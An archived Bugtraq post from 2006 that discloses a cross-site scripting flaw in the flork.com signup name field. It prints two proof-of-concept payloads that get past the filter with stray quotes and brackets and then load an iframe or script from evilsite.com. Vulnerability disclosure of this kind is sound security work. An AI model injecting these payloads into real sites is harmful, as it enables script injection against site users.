Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Flork.com

From: luny () youfucktard com
Date: 10 Jun 2006 20:49:42 -0000
Flork.com

Effected files:
input boxes when creating a new user

XSS Vulnerabiliy:

We notice by adding empty tags and endingand beginning brackets we can bypass the filter of the flork.com signup.
For PoC try adding either one of the below codes in as your name:

">'>'><iframe src=http://evilsite.com/scriptlet.html <<"<'<'

">'>'><SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT><'<'
Previous By Date Next
Previous By Thread Next

Current thread: